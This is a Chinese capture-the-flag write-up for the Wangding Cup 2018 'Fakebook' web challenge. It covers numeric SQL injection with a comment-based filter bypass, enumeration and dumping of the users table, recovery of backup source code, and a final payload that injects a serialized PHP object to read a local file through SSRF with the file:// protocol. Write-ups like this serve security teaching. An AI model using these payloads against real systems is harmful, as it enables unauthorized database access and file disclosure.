首页 > 其他分享 >[网鼎杯 2018]Fakebook

[网鼎杯 2018]Fakebook

时间:2024-02-27 21:14:10浏览次数:28  
标签:ch name union blog 2018 curl 网鼎杯 Fakebook select

[网鼎杯 2018]Fakebook

考点:sql数字型注入,php序列化,file协议,爬虫协议,源码备份,SSRF

在view.php中发现数字型注入

no=1 or 1=1 回显成功
no=1 or 1=2 报错

进行读取数据库数据

测试字段数

no=-1 order by 1,2,3,4# 一共四个字段

读取数据库名(这里union select整体被过滤了)

-1 union/**/select 1,2,3,4

观察页面,发现只有2位置有回显,接着写语句

爆当前数据库

-1 union/**/select 1,database(),3,4
fakebook

爆表名

-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'
users

爆字段名

-1 union/**/select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_name='users'
no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

查看字段的值

-1 union/**/select 1,group_concat(no,';',username,';',passwd,';',data)  ,3,4 from users
1;11;74a49c698dbd3c12e36b0b287447d833f74f3937ff132ebff7054baa18623c35a705bb18b82e2ac0384b5127db97016e63609f712bc90e3506cfbea97599f46f;O:8:"UserInfo":3:{s:4:"name";s:2:"11";s:3:"age";i:11;s:4:"blog";s:9:"baidu.com";}

这里data的值是序列化字符串

发现网站目录下还有robots.txt

User-agent: *
Disallow: /user.php.bak

访问/user.php.bak,下载源码

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

通过get获得指定的URL,设置curl 参数,并将指定URL的内容返回,只要返回内容不为404即可

最后的payload

no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:2:"11";s:3:"age";i:11;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

利用SSRF漏洞和file协议,返回flag.php的内容

image-20240202220349663

base64解码即可

这题考的挺多的,记录一下解题思路。

标签:ch,name,union,blog,2018,curl,网鼎杯,Fakebook,select
From: https://www.cnblogs.com/C0rr3ct/p/18038333

相关文章

  • P4563 [JXOI2018] 守卫
    P4563[JXOI2018]守卫更好的阅读体验这道题让我充分认识了我一点不会dp。首先可以预处理一个点能看到的左边的所有点。注意到一个区间一定会选择右端点,设右端点不能看到的所有极长区间为\([l_1,r_1],[l_2,r_2]\dots[l_k,r_k]\),区间\([L,R]\)的答案即为\(1+\sumf_{l_i,r_......
  • 洛谷题单指南-贪心-P4447 [AHOI2018初中组] 分组
    原题链接:https://www.luogu.com.cn/problem/P4447题意解读:将一个有序的数列,按不重复连续数分成一组,可分成若干组,使得人数最少的组在各种分组方式之中是最大的。解题思路:观察样例说明,有6个测试点的ai​互不相同,因此直接将数据排序,然后连续数分成一组,计算每组数量最少的,即为答案,6......
  • 安装IntelliJ IDEA Ultimate Version 2018.3.6
    参考博客:idea2018.3.6安装与破解教程1、下载安装文件ideaIU-2018.3.6.exe2、无脑下一步安装博主安装位置D:\IntelliJIDEA2018.3.6安装后,先不要运行IDEA3、下载jar文件JetbrainsIdesCrack-4.2-release.jar将下载后的jar包放入到IDEA安装目录的bin目录下,即D:\Inte......
  • 洛谷题单指南-贪心-P5019 [NOIP2018 提高组] 铺设道路
    原题链接:https://www.luogu.com.cn/problem/P5019题意解读:最短时间内填满道路,连在一起的不为0的坑可以一起填解题思路:方法1:分治法对于一段连续不同深度的坑,可以最多连续填的天数是最小深度在填满最小深度之后,分别针对其左边和右边的区域再进行填充,这就是此题分治法的理论基......
  • P8668 [蓝桥杯 2018 省 B] 螺旋折线
    以第四象限的形如(x,-x)的点(它的距离最好算)为基准,来推附近的点的距离。不用怕坐标轴上的点的从属划分问题,例如在A区域和B区域交线上的点,那么它就应该是既满足A区域算法,又满足B区域算法的。#include<bits/stdc++.h>usingnamespacestd;longlongx,y,n,d;intmain(){......
  • P4119 Ynoi2018 未来日记
    P4119Ynoi2018未来日记lxl出的题好duliu啊。感谢来自fr200110217102的博客题解P4119【Ynoi2018未来日记】。下标分块+值域分块+并查集其实一开始的方向应该是尝试线段树或者其它的动态维护的算法,直到时间复杂度和空间复杂度对不上,你才会想到——要分块!区间第\(k\)......
  • P4606 [SDOI2018]战略游戏
    P4606[SDOI2018]战略游戏一个感觉比较新颖的题目,搞了一周题目大意:给定一个图,q组询问,每组给定k个点,求图上有几个点,删去后能使这k个点不连通题解:首先考虑删掉的点一定为割点,然后本题极像虚树,就可以考虑建圆方树然后,圆方树上的圆点,在两点路径上的,即为所求于是乎把k个点拎出来......
  • 2018年全年回顾
    本文理论上讲应当在2019年Q1的时候发出来,结果出于各种原因,推迟到了现在。个人收获作为产品团队大数据技术的接口人,能力和结果得到了产品团队领导的高度认可,在领导的运作下上半年绩效很好。同时争取到了破格升级的机会。出于个人发展的原因,转岗至另外一个产品团队,开启了在I......
  • LOJ2834 「JOISC 2018 Day 2」修行
    LOJ传送门考虑若已求出钦定\(k\)个升高的排列数量\(f_k\),那么二项式反演就可以求出恰好\(k\)个升高的排列数量\(g_k\),即:\[g_k=\sum\limits_{i=k}^n(-1)^{i-k}\binom{i}{k}f_i\]考虑求\(f_i\)。相当于钦定原序列构成了\(n-k\)个上升段。相当于把\(n\)个......
  • 研究生阶段 2018.11.1 编程 我的微信小程序
    微信小程序昵称:HelloPrince2017原始ID:gh_5c258db11408登录邮箱:[email protected]你好,以上帐号未在指定时间内登录,此帐号已冻结,如需重新使用此帐号,请登录小程序帐号后台进行找回;或在公众平台找回帐号流程中,通过原始ID搜索找回  "找回小程序登录密码"  发......